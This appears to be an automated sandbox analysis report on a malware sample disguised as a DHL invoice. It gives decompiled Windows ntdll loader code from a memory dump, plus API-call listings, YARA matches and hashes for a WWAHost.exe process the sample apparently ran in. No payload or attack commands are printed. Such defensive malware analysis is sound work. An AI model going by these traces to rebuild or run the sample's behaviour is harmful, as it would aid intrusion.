0x1d7a5d37
0x1d7a5d39
0x1d7a5d40
0x1d7a5d47
0x1d7a5f41
0x1d7a5f47
0x1d7a5fc2
0x1d7a5fc8
0x1d7a5f49
0x1d7a5f49
0x1d7a5f49
0x1d7a5d4d
0x1d7a5d4d
0x1d7a5d4d
0x00000000
0x1d7a5d47
0x1d7a5be7
0x1d7a5e7f
0x1d7a5baf
0x00000000
0x1d7a5baf
0x1d7a5ba1
0x1d7a5a46
0x1d7a5a4b
0x1d7a5a52
0x1d7a5a5f
0x1d7a5a64
0x1d7a5a6b
0x1d7a5a71
0x1d7a5a76
0x1d800772
0x1d7a6068
0x1d7a6073
0x1d7a6073
0x1d7a5a7c
0x1d7a5a82
0x1d7a5a88
0x1d7a5a8e
0x1d7a5a92
0x1d7a5a95
0x1d7a5a9c
0x1d7a5aa3
0x1d7a5ab6
0x1d7a5abb
0x1d7a5abe
0x1d7a5ac5
0x1d7a5ace
0x1d7a5ad1
0x1d7a5ad3
0x00000000
0x1d7a5ad3
0x1d7a59fe
0x1d7a5a01
0x1d7a5a07
0x1d7a5a08
0x1d7a5a0d
0x1d7a5a15
0x00000000
0x00000000
0x1d7a5a1b
0x1d7a5a1e
0x00000000

Strings

@, xrefs: 1D8008AE

Memory Dump Source

Source File: 00000003.00000002.18146591431.000000001D770000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D770000, based on PE: true

Associated: 00000003.00000002.18149183497.000000001D899000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.18149218359.000000001D89D000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d770000_DHL-INVOICE-MBV.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 4323e3727066b4b060e8039cea6236402460113ae16649693e57c8e05fe54a97
Instruction ID: becb4b55da3373fb135421a7b9dec650c384cce087dd53c555c7305d25f33020
Opcode Fuzzy Hash: 4323e3727066b4b060e8039cea6236402460113ae16649693e57c8e05fe54a97
Instruction Fuzzy Hash: 18326C74D0426ADFDB21CF64C884BEDBBB0BF08324F0482EAD549A7651D7756A84CF92

Uniqueness

Uniqueness Score: -1.00%

Function 1D7D4B79 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E1D7D4B79(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				signed int _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				signed int _v72;
				intOrPtr _v76;
				signed int _v84;
				signed int _v88;
				char _v92;
				signed int _v96;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t82;
				signed int _t86;
				signed int _t89;
				intOrPtr* _t97;
				signed int _t99;
				void* _t102;
				void* _t104;
				signed int _t111;
				intOrPtr* _t112;
				intOrPtr* _t113;
				signed int _t114;
				void* _t115;

				_t107 = __edx;
				_t72 =  *0x1d89b370 ^ _t114;
				_v8 =  *0x1d89b370 ^ _t114;
				_t110 = __ecx;
				_v96 = __edx;
				_t99 = __edx;
				if(__edx == 0 || ( *(__edx + 8) & 0x00000004) != 0) {
					L12:
					return E1D7E4B50(_t72, _t97, _v8 ^ _t114, _t107, _t110, _t111);
				} else {
					_t110 = __ecx + 4;
					_t97 =  *_t110;
					while(_t97 != _t110) {
						_t6 = _t97 - 8; // -4
						_t111 = _t6;
						_t107 = 1;
						if( *_t111 != 0x74736c46) {
							_v84 = _v84 & 0x00000000;
							_push( &_v92);
							_v76 = 4;
							_v72 = 1;
							_v68 = 1;
							_v64 = _t110;
							_v60 = _t111;
							_v92 = 0xc0150015;
							_v88 = 1;
							E1D7F8A60(_t99, 1);
							_t99 = _v96;
							_t107 = 1;
						}
						if( *(_t111 + 0x14) !=  !( *(_t111 + 4))) {
							_v84 = _v84 & 0x00000000;
							_push( &_v92);
							_v76 = 4;
							_v72 = _t107;
							_v68 = 2;
							_v64 = _t110;
							_v60 = _t111;
							_v92 = 0xc0150015;
							_v88 = _t107;
							E1D7F8A60(_t99, _t107);
							_t99 = _v96;
						}
						_t9 = _t111 + 0x18; // 0x1c
						_t72 = _t9;
						if(_t99 < _t9) {
							L13:
							_t97 =  *_t97;
							continue;
						} else {
							_t10 = _t111 + 0x618; // 0x614
							_t72 = _t10;
							if(_t99 >= _t10) {
								goto L13;
							} else {
								_v96 = 0x30;
								_t82 = _t99 - _t111 - 0x18;
								asm("cdq");
								_t107 = _t82 % _v96;
								_t72 = 0x18 + _t82 / _v96 * 0x30 + _t111;
								if(_t99 == 0x18 + _t82 / _v96 * 0x30 + _t111) {
									_t72 =  *(_t111 + 4);
									if(_t72 != 0) {
										_t86 = _t72 - 1;
										 *(_t111 + 4) = _t86;
										_t72 =  !_t86;
										 *(_t111 + 0x14) =  !_t86;
										 *((intOrPtr*)(_t99 + 8)) = 4;
										if( *(_t111 + 4) == 0) {
											_t72 =  *(_t97 + 4);
											if(_t72 != _t110) {
												do {
													_t111 =  *(_t72 + 4);
													_t56 = _t72 - 8; // 0xfffffff6
													_t107 = _t56;
													if( *((intOrPtr*)(_t107 + 4)) != 0) {
														goto L33;
													} else {
														_t102 =  *_t72;
														if( *(_t102 + 4) != _t72 ||  *_t111 != _t72) {
															_push(3);
															asm("int 0x29");
															_t104 = 0x3f;
															if( *((intOrPtr*)(_t72 + 2)) == _t104 &&  *(_t72 + 4) == _t104 &&  *((intOrPtr*)(_t72 + 6)) == _t111 &&  *(_t72 + 8) != _t97 &&  *((short*)(_t72 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t72 + 0xc)) == _t111) {
																_t72 = _t72 + 8;
															}
															_t112 =  *0x1d8965e4; // 0x75f6f0e0
															 *0x1d8991e0(_t107, _t72,  &_v8);
															_t113 =  *_t112();
															if(_t113 >= 0) {
																L18:
																_t89 = _v8;
																if(_t89 != 0) {
																	if( *(_t110 + 0x48) != _t97) {
																		E1D7A26A0(_t89,  *(_t110 + 0x48));
																		_t89 = _v8;
																	}
																	 *(_t110 + 0x48) = _t89;
																}
																if(_t113 < 0) {
																	if(( *0x1d8937c0 & 0x00000003) != 0) {
																		E1D81E692("minkernel\\ntdll\\ldrsnap.c", 0x2eb, "LdrpFindDllActivationContext", _t97, "Querying the active activation context failed with status 0x%08lx\n", _t113);
																	}
																	if(( *0x1d8937c0 & 0x00000010) != 0) {
																		asm("int3");
																	}
																}
																return _t113;
															} else {
																if(_t113 != 0xc000008a) {
																	if(_t113 == 0xc000008b || _t113 == 0xc0000089 || _t113 == 0xc000000f || _t113 == 0xc0000204 || _t113 == 0xc0000002) {
																		goto L16;
																	} else {
																		if(_t113 != 0xc00000bb) {
																			goto L18;
																		} else {
																			goto L16;
																		}
																	}
																	goto L53;
																} else {
																	L16:
																	if(( *0x1d8937c0 & 0x00000005) != 0) {
																		_push(_t113);
																		_t67 = _t110 + 0x24; // 0x123
																		E1D81E692("minkernel\\ntdll\\ldrsnap.c", 0x2ce, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t67);
																		_t115 = _t115 + 0x1c;
																	}
																	_t113 = _t97;
																}
																goto L18;
															}
														} else {
															 *_t111 = _t102;
															 *(_t102 + 4) = _t111;
															E1D7B3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t107);
															goto L33;
														}
													}
													goto L53;
													L33:
													_t72 = _t111;
												} while (_t111 != _t110);
											}
										}
									}
								}
								goto L12;
							}
						}
						goto L53;
					}
					goto L12;
				}
				L53:
			}

0x1d7d4b79
0x1d7d4b86
0x1d7d4b88
0x1d7d4b8e
0x1d7d4b90
0x1d7d4b93
0x1d7d4b97
0x1d7d4c27
0x1d7d4c35
0x1d7d4ba7
0x1d7d4ba7
0x1d7d4baa
0x1d7d4bac
0x1d7d4bb2
0x1d7d4bb2
0x1d7d4bb5
0x1d7d4bbc
0x1d81330f
0x1d813316
0x1d813317
0x1d81331e
0x1d813321
0x1d813324
0x1d813327
0x1d81332a
0x1d813331
0x1d813334
0x1d813339
0x1d81333e
0x1d81333e
0x1d7d4bca
0x1d813344
0x1d81334b
0x1d81334c
0x1d813353
0x1d813356
0x1d81335d
0x1d813360
0x1d813363
0x1d81336a
0x1d81336d
0x1d813372
0x1d813372
0x1d7d4bd0
0x1d7d4bd0
0x1d7d4bd5
0x1d7d4c36
0x1d7d4c36
0x00000000
0x1d7d4bd7
0x1d7d4bd7
0x1d7d4bd7
0x1d7d4bdf
0x00000000
0x1d7d4be1
0x1d7d4be3
0x1d7d4bec
0x1d7d4bef
0x1d7d4bf0
0x1d7d4bf9
0x1d7d4bfd
0x1d7d4bff
0x1d7d4c04
0x1d7d4c06
0x1d7d4c07
0x1d7d4c0a
0x1d7d4c0c
0x1d7d4c0f
0x1d7d4c1a
0x1d7d4c1c
0x1d7d4c21
0x1d81337a
0x1d81337a
0x1d81337d
0x1d81337d
0x1d813384
0x00000000
0x1d813386
0x1d813386
0x1d81338b
0x1d8133b2
0x1d8133b5
0x1d8133b9
0x1d8133be
0x1d8133f7
0x1d8133f7
0x1d7d4c76
0x1d7d4c84
0x1d7d4c8c
0x1d7d4c90
0x1d7d4ca9
0x1d7d4ca9
0x1d7d4cae
0x1d7d4ce4
0x1d7d4cee
0x1d7d4cf3
0x1d7d4cf3
0x1d7d4ce6
0x1d7d4ce6
0x1d7d4cb2
0x1d813463
0x1d81347b
0x1d813480
0x1d81348a
0x1d813490
0x1d813490
0x1d81348a
0x1d7d4cbe
0x1d7d4c92
0x1d7d4c98
0x1d7d4cc5
0x00000000
0x1d813423
0x1d813429
0x00000000
0x1d81342f
0x00000000
0x1d81342f
0x1d813429
0x00000000
0x1d7d4c9a
0x1d7d4c9a
0x1d7d4ca1
0x1d813434
0x1d813435
0x1d81344f
0x1d813454
0x1d813454
0x1d7d4ca7
0x1d7d4ca7
0x00000000
0x1d7d4c98
0x1d813391
0x1d813398
0x1d81339c
0x1d8133a2
0x00000000
0x1d8133a2
0x1d81338b
0x00000000
0x1d8133a7
0x1d8133a7
0x1d8133a9
0x1d8133ad
0x1d7d4c21
0x1d7d4c1a
0x1d7d4c04
0x00000000
0x1d7d4bfd
0x1d7d4bdf
0x00000000
0x1d7d4bd5
0x00000000
0x1d7d4bac
0x00000000

Strings

Flst, xrefs: 1D7D4BB6
0, xrefs: 1D7D4BE3

Memory Dump Source

Source File: 00000003.00000002.18146591431.000000001D770000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D770000, based on PE: true

Associated: 00000003.00000002.18149183497.000000001D899000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.18149218359.000000001D89D000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d770000_DHL-INVOICE-MBV.jbxd

Similarity

API ID:
String ID: 0$Flst
API String ID: 0-758220159
Opcode ID: 938c832cebc666b175332f838212577021a2b09f6adef00f443db8ba500ee70d
Instruction ID: f00d86cc9d92c85a7303781e362eb21f6851576cb6efb1a69405171906a923ed
Opcode Fuzzy Hash: 938c832cebc666b175332f838212577021a2b09f6adef00f443db8ba500ee70d
Instruction Fuzzy Hash: E85189B1A00B998FDB25CF94D5847A9FBF4FF44B28F15802AD04D9B250E7709985CB82

Uniqueness

Uniqueness Score: -1.00%

Function 1D7A0485 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 135
timeCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E1D7A0485(intOrPtr* __ecx) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _t50;
				intOrPtr* _t51;
				intOrPtr* _t73;
				intOrPtr _t76;
				char _t84;
				void* _t85;
				intOrPtr _t86;
				intOrPtr* _t89;

				_t89 = __ecx;
				_t76 =  *[fs:0x30];
				_t73 =  *0x1d896630; // 0x0
				_v32 = 0;
				_v28 = 0;
				_v8 = 0;
				 *((intOrPtr*)(__ecx + 4)) =  *((intOrPtr*)(_t76 + 0xa4));
				 *((intOrPtr*)(__ecx + 8)) =  *((intOrPtr*)(_t76 + 0xa8));
				 *(__ecx + 0xc) =  *(_t76 + 0xac) & 0x0000ffff;
				_v12 = _t76;
				 *((intOrPtr*)(__ecx + 0x10)) =  *((intOrPtr*)(_t76 + 0xb0));
				_t84 = 0;
				if(_t73 == 0) {
					_t73 = L1D7A82E0(0xabababab, 0, "kLsE", 0);
					 *0x1d896630 = _t73;
					if(_t73 != 0) {
						goto L1;
					}
					L4:
					_t85 = _t84 - 1;
					if(_t85 == 0) {
						 *((intOrPtr*)(_t89 + 8)) = 2;
						 *((intOrPtr*)(_t89 + 0xc)) = 0x23f0;
						L19:
						 *((intOrPtr*)(_t89 + 4)) = 6;
						L6:
						_t86 = _v12;
						_t51 =  *((intOrPtr*)(_t86 + 0x1f4));
						if(_t51 == 0 ||  *_t51 == 0) {
							L8:
							 *((short*)(_t89 + 0x14)) = 0;
							goto L9;
						} else {
							_t38 = _t89 + 0x14; // 0x130
							if(E1D7C5C3F(_t38, 0x100, _t51) >= 0) {
								L9:
								if( *_t89 != 0x11c) {
									if( *_t89 != 0x124) {
										L16:
										return 0;
									}
								}
								 *((short*)(_t89 + 0x114)) =  *(_t86 + 0xaf) & 0x000000ff;
								 *(_t89 + 0x116) =  *(_t86 + 0xae) & 0x000000ff;
								 *(_t89 + 0x118) = E1D7A0670();
								if( *_t89 == 0x124) {
									 *(_t89 + 0x11c) = E1D7A0670() & 0x0001ffff;
								}
								 *((char*)(_t89 + 0x11a)) = 0;
								if(E1D7A0630( &_v16) != 0) {
									 *((char*)(_t89 + 0x11a)) = _v16;
								}
								E1D7E5050(0xff,  &_v32, L"TerminalServices-RemoteConnectionManager-AllowAppServerMode");
								_push( &_v24);
								_push(4);
								_push( &_v8);
								_push( &_v20);
								_push( &_v32);
								if(E1D7E3EE0() >= 0) {
									if(_v8 == 1) {
										if(_v20 != 4 || _v24 != 4) {
											goto L15;
										} else {
											goto L16;
										}
									}
									L15:
									 *(_t89 + 0x118) =  *(_t89 + 0x118) & 0x0000ffef;
									if( *_t89 == 0x124) {
										 *(_t89 + 0x11c) =  *(_t89 + 0x11c) & 0x0001ffef;
									}
								}
								goto L16;
							}
							goto L8;
						}
					}
					if(_t85 == 1) {
						 *((intOrPtr*)(_t89 + 8)) = 3;
						 *((intOrPtr*)(_t89 + 0xc)) = 0x2580;
						goto L19;
					}
					goto L6;
				}
				L1:
				if(_t73 != E1D7A0690) {
					 *0x1d8991e0();
					_t50 =  *_t73();
				} else {
					_t50 = E1D7A0690();
				}
				_t84 = _t50;
				goto L4;
			}

0x1d7a048f
0x1d7a0493
0x1d7a049a
0x1d7a04a0
0x1d7a04a3
0x1d7a04a6
0x1d7a04af
0x1d7a04b8
0x1d7a04c2
0x1d7a04cb
0x1d7a04ce
0x1d7a04d2
0x1d7a04d6
0x1d7a060e
0x1d7a0610
0x1d7a0618
0x00000000
0x00000000
0x1d7a04ef
0x1d7a04ef
0x1d7a04f2
0x1d7a05e3
0x1d7a05ea
0x1d7a05f1
0x1d7a05f1
0x1d7a0501
0x1d7a0501
0x1d7a0504
0x1d7a050c
0x1d7a0519
0x1d7a051b
0x00000000
0x1d7fe99c
0x1d7fe9a2
0x1d7fe9ac
0x1d7a051f
0x1d7a052a
0x1d7fe9b9
0x1d7a05cd
0x1d7a05d3
0x1d7a05d3
0x1d7fe9bf
0x1d7a053c
0x1d7a054d
0x1d7a0559
0x1d7a0562
0x1d7fe9ce
0x1d7fe9ce
0x1d7a056a
0x1d7a057b
0x1d7a0580
0x1d7a0580
0x1d7a058f
0x1d7a0597
0x1d7a0598
0x1d7a059d
0x1d7a05a1
0x1d7a05a5
0x1d7a05ad
0x1d7a05b3
0x1d7fe9dd
0x00000000
0x1d7fe9ed
0x00000000
0x1d7fe9ed
0x1d7fe9dd
0x1d7a05b9
0x1d7a05be
0x1d7a05c7
0x1d7fe9f2
0x1d7fe9f2
0x1d7a05c7
0x00000000
0x1d7a05ad
0x00000000
0x1d7fe9b2
0x1d7a050c
0x1d7a04fb
0x1d7fe989
0x1d7fe990
0x00000000
0x1d7fe990
0x00000000
0x1d7a04fb
0x1d7a04dc
0x1d7a04e2
0x1d7a05d6
0x1d7a05dc
0x1d7a04e8
0x1d7a04e8
0x1d7a04e8
0x1d7a04ed
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 1D7A05D6

Strings

TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 1D7A0586
kLsE, xrefs: 1D7A05FE

Memory Dump Source

Source File: 00000003.00000002.18146591431.000000001D770000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D770000, based on PE: true

Associated: 00000003.00000002.18149183497.000000001D899000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.18149218359.000000001D89D000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d770000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: DebugPrintTimes
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
API String ID: 3446177414-2547482624
Opcode ID: 05512e75aa357d561f2f17ae13b3cd56ff152853177427cd82d4b48a49cf139c
Instruction ID: 63e5e19aafb0ae21b907580ee639ef937a23c2ef34016714b3a02bdba8c64462
Opcode Fuzzy Hash: 05512e75aa357d561f2f17ae13b3cd56ff152853177427cd82d4b48a49cf139c
Instruction Fuzzy Hash: 3B51CD71A00756DFC726DFA4C485AAAB7F4BF44724F088E3ED69983250E734A504CB63

Uniqueness

Uniqueness Score: -1.00%

Function 1D79DF21 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109
timeCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E1D79DF21(void* __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v36;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v60;
				char _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t48;
				intOrPtr _t49;
				intOrPtr _t50;
				intOrPtr* _t52;
				char _t56;
				void* _t69;
				char _t72;
				void* _t73;
				intOrPtr _t75;
				intOrPtr _t79;
				void* _t82;
				void* _t84;
				intOrPtr _t86;
				void* _t88;
				signed int _t90;
				signed int _t92;
				signed int _t93;

				_t80 = __edx;
				_t92 = (_t90 & 0xfffffff8) - 0x4c;
				_v8 =  *0x1d89b370 ^ _t92;
				_t72 = 0;
				_v72 = __edx;
				_t82 = __ecx;
				_t86 =  *((intOrPtr*)(__edx + 0xc8));
				_v68 = _t86;
				E1D7E8F40( &_v60, 0, 0x30);
				_t48 =  *((intOrPtr*)(_t82 + 0x70));
				_t93 = _t92 + 0xc;
				_v76 = _t48;
				_t49 = _t48;
				if(_t49 == 0) {
					_push(5);
					 *((char*)(_t82 + 0x6a)) = 0;
					 *((intOrPtr*)(_t82 + 0x6c)) = 0;
					goto L3;
				} else {
					_t69 = _t49 - 1;
					if(_t69 != 0) {
						if(_t69 == 1) {
							_push(0xa);
							goto L3;
						} else {
							_t56 = 0;
						}
					} else {
						_push(4);
						L3:
						_pop(_t50);
						_v80 = _t50;
						if(_a4 == _t72 && _t86 != 0 && _t50 != 0xa &&  *((char*)(_t82 + 0x6b)) == 1) {
							L1D7B2330(_t50, _t86 + 0x1c);
							_t79 = _v72;
							 *((intOrPtr*)(_t79 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
							 *((intOrPtr*)(_t79 + 0x88)) =  *((intOrPtr*)(_t82 + 0x68));
							 *((intOrPtr*)(_t79 + 0x8c)) =  *((intOrPtr*)(_t82 + 0x6c));
							 *((intOrPtr*)(_t79 + 0x90)) = _v80;
							 *((intOrPtr*)(_t79 + 0x20)) = _t72;
							E1D7B24D0(_t86 + 0x1c);
						}
						_t75 = _v80;
						_t52 =  *((intOrPtr*)(_v72 + 0x20));
						_t80 =  *_t52;
						_v72 =  *((intOrPtr*)(_t52 + 4));
						_v52 =  *((intOrPtr*)(_t82 + 0x68));
						_v60 = 0x30;
						_v56 = _t75;
						_v48 =  *((intOrPtr*)(_t82 + 0x6c));
						asm("movsd");
						_v76 = _t80;
						_v64 = 0x30;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						if(_t80 != 0) {
							 *0x1d8991e0(_t75, _v72,  &_v64,  &_v60);
							_t72 = _v76();
						}
						_t56 = _t72;
					}
				}
				_pop(_t84);
				_pop(_t88);
				_pop(_t73);
				return E1D7E4B50(_t56, _t73, _v8 ^ _t93, _t80, _t84, _t88);
			}

0x1d79df21
0x1d79df29
0x1d79df33
0x1d79df3b
0x1d79df40
0x1d79df44
0x1d79df46
0x1d79df52
0x1d79df56
0x1d79df5b
0x1d79df5e
0x1d79df61
0x1d79df65
0x1d79df67
0x1d79e058
0x1d79e05a
0x1d79e05d
0x00000000
0x1d79df6d
0x1d79df6d
0x1d79df70
0x1d7fd6ea
0x1d7fd6f3
0x00000000
0x1d7fd6ec
0x1d7fd6ec
0x1d7fd6ec
0x1d79df76
0x1d79df76
0x1d79df78
0x1d79df78
0x1d79df79
0x1d79df80
0x1d79e019
0x1d79e024
0x1d79e02c
0x1d79e032
0x1d79e03b
0x1d79e045
0x1d79e04b
0x1d79e04e
0x1d79e04e
0x1d79df8d
0x1d79df91
0x1d79df94
0x1d79df99
0x1d79dfa0
0x1d79dfab
0x1d79dfb3
0x1d79dfb7
0x1d79dfbb
0x1d79dfbc
0x1d79dfc0
0x1d79dfc8
0x1d79dfc9
0x1d79dfca
0x1d79dfcd
0x1d79dfe0
0x1d79dfea
0x1d79dfea
0x1d79dfec
0x1d79dfec
0x1d79df70
0x1d79dff2
0x1d79dff3
0x1d79dff4
0x1d79dfff

APIs

RtlDebugPrintTimes.NTDLL ref: 1D79DFE0

Strings

0, xrefs: 1D79DFAB
0, xrefs: 1D79DFC0

Memory Dump Source

Source File: 00000003.00000002.18146591431.000000001D770000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D770000, based on PE: true

Associated: 00000003.00000002.18149183497.000000001D899000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.18149218359.000000001D89D000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d770000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: DebugPrintTimes
String ID: 0$0
API String ID: 3446177414-203156872
Opcode ID: 533c53a7f1fa25187c95dbbb3ae1dba2fb2a9535692582b2912a63b324f161b0
Instruction ID: d519fa2362a757f54f8d7cfe01bab3dc9a074ff71383cc880f223f3e594fa82d
Opcode Fuzzy Hash: 533c53a7f1fa25187c95dbbb3ae1dba2fb2a9535692582b2912a63b324f161b0
Instruction Fuzzy Hash: 10416BB26087429FC304CF28D484A5ABBE5BB8C764F044A2EF598DB300D771EA05CB97

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: WWAHost.exePID: 1436, Parent PID: 7188COMMON

Execution Graph

Execution Coverage:	3.4%
Dynamic/Decrypted Code Coverage:	1.3%
Signature Coverage:	0.9%
Total number of Nodes:	1231
Total number of Limit Nodes:	135

Executed Functions

Function 02D42C70 Relevance: 4.6, APIs: 3, Instructions: 101fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(?,00000000), ref: 02D42D3F
FindNextFileW.KERNELBASE(?,00000010), ref: 02D42D7E
FindClose.KERNELBASE(?), ref: 02D42D89

Memory Dump Source

Source File: 00000005.00000002.22561838219.0000000002D30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2d30000_WWAHost.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: 3743b05e8a6be944846432c6a1bed32415ed62856993ed0a10bde97321d73611
Instruction ID: 5d8060810583a70205385bb82c5043960e69b9d8b2420eae58a1b065fe4a9339
Opcode Fuzzy Hash: 3743b05e8a6be944846432c6a1bed32415ed62856993ed0a10bde97321d73611
Instruction Fuzzy Hash: 92317271900209ABEB20DF64CC89FEB7779EF44705F144499B959A7280DB70AA84CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02D4C72A Relevance: 1.5, APIs: 1, Instructions: 43filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000005,00000000,02D4708C,00000005,FFFFFFFF,?,?,FFFFFFFF,00000005,02D4708C,00000000,00000005,00000060,00000000,00000000), ref: 02D4C77D

Memory Dump Source

Source File: 00000005.00000002.22561838219.0000000002D30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2d30000_WWAHost.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: d9665fa4ff66da7c1ae1f4784abfe6694da6806750e79f1e938a8248fad35a11
Instruction ID: 6d62d141f13a348191108e281c9cea8db53b1454e2d284db270790a2dc76cc3f
Opcode Fuzzy Hash: d9665fa4ff66da7c1ae1f4784abfe6694da6806750e79f1e938a8248fad35a11
Instruction Fuzzy Hash: E201AFB6655108ABCB18DF98DC95EEB37A9EF8C354F158248BA4A97241D630E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02D4C730 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000005,00000000,02D4708C,00000005,FFFFFFFF,?,?,FFFFFFFF,00000005,02D4708C,00000000,00000005,00000060,00000000,00000000), ref: 02D4C77D

Memory Dump Source

Source File: 00000005.00000002.22561838219.0000000002D30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2d30000_WWAHost.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: e85e77ba2c54ed5fbcc428c4a95e80045b35a7a87df5efc95b4940160543289c
Instruction ID: 35c218c548fc99bbb12f5a1c3c23565894dad519b33339b7b1778845e154c13f
Opcode Fuzzy Hash: e85e77ba2c54ed5fbcc428c4a95e80045b35a7a87df5efc95b4940160543289c
Instruction Fuzzy Hash: D9F062B2215208ABCB58DF99DC85EDB77ADAF8C754F118248BA0997241D630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02D38880 Relevance: 1.5, Strings: 1, Instructions: 288COMMON

Download Yara Rule

Strings

2, xrefs: 02D38A27

Memory Dump Source

Source File: 00000005.00000002.22561838219.0000000002D30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2d30000_WWAHost.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID: 2
API String ID: 2340568224-450215437
Opcode ID: 1cb743a3d04c0b61fb5d966f7746738b70110c27e4cf178e0e52b94b32a262d3
Instruction ID: d9c64253459490aead8697486d409f5ade505609333a163eb52680c6c84e40d5
Opcode Fuzzy Hash: 1cb743a3d04c0b61fb5d966f7746738b70110c27e4cf178e0e52b94b32a262d3
Instruction Fuzzy Hash: 7DA17EB2D00219ABDB16DFA4CC45EEEB7B9EF44304F048569E549A6340EB70AA44CFB5

Uniqueness

Uniqueness Score: -1.00%

Function 02D4C7E0 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(02D47250,02D42524,FFFFFFFF,02D46D3A,00000206,?,02D47250,00000206,02D46D3A,FFFFFFFF,02D42524,02D47250,00000206,00000000), ref: 02D4C825

Memory Dump Source

Source File: 00000005.00000002.22561838219.0000000002D30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2d30000_WWAHost.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 46e9d61f60eefd5b9ec08f7c79a1628f979f043a503e788909cff7321939f862
Instruction ID: 511d7885d31d39ff463aa18680f0a9ac8ba8a59235ccaf73d4a247b64d8a66e0
Opcode Fuzzy Hash: 46e9d61f60eefd5b9ec08f7c79a1628f979f043a503e788909cff7321939f862
Instruction Fuzzy Hash: 95F0A4B2210108ABCB14DF89DC84EEB77ADEF8C754F118248BA4D97241D630E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02D4C910 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02D32D11,00002000,00003000,00000004), ref: 02D4C949

Memory Dump Source

Source File: 00000005.00000002.22561838219.0000000002D30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2d30000_WWAHost.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: ff407167e8468b06ad404ccbb9f5efcd270d3cf321b6c6ce0313f5831c1888d1
Instruction ID: 741f469c44be622e8a6d8e2c616e74a6e5d8495a4c3ef3d145d6fa0847d4a029
Opcode Fuzzy Hash: ff407167e8468b06ad404ccbb9f5efcd270d3cf321b6c6ce0313f5831c1888d1
Instruction Fuzzy Hash: D6F01CB1210208ABCB14DF89DC44E9B77ADEF88754F018108BE0997341C630F810CBB4

Uniqueness

Uniqueness Score: -1.00%

